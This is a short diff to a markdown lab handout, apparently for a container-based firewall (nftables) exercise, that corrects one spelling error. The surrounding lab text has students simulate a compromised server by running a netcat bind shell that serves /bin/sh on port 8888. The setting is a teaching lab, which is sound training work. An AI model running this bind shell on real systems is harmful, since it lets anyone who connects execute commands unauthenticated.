rxt1077/ssh-container/labs/nft.md

 Choose one of your terminals to be the compromised server and execute the following command on it.
 You only need to type what is *after* the # prompt.
 Note the IP_ADDRESS that is shown in your prompt.
-From now on this will be refered to as the compromised server's ip address.
+From now on this will be referred to as the compromised server's ip address.

 ```console
 root@IP_ADDRESS:~# nc -l -p 8888 -e /bin/sh &